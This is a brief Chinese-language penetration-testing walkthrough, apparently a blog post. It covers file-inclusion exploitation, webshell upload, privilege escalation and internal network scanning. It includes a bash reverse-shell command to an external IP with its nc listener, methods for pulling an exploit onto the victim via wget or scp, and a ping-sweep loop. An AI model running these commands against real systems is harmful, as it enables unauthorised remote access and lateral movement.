一、web应用信息收集
1、端口扫描
nmap扫描结果
2、文件包含漏洞
文件包含漏洞
二、web应用漏洞利用
1、找到可写入路径
权限
2、写shell
shell上传
三、内网渗透初探
1、建立持续性shell
通过bash,nc建立持续性shell。
被控机:bash -i >& /dev/tcp/175.24.112.166/8080 0>&1
vps:nc -lvvp 8080
shell
2、提权
linux提权思路——查看内核版本,找特殊目录,找特殊应用等。
用uname -a查看内核版本,寻找该内核版本漏洞。上传提权exp:
- 可以菜刀直接上传;
- 可以搭个web服务,用wget下载;
- 也可以被控机从vps scp获得。
发现tmp目录下拥有执行权限,进行提权操作。
提权
四、横向扩展
1、内网环境探测
通过arp -a探测到路由情况,
然后通过批量ping的bash脚本探测内网环境。
for var in {1..254};
do
ip=192.168.1.$var
ping -c 1 $ip | grep ttl
done
2、代理
利用msf搭建socks,使用proxychains代理nmap扫描。
https://www.cnblogs.com/diligenceday/p/11010733.html
网友评论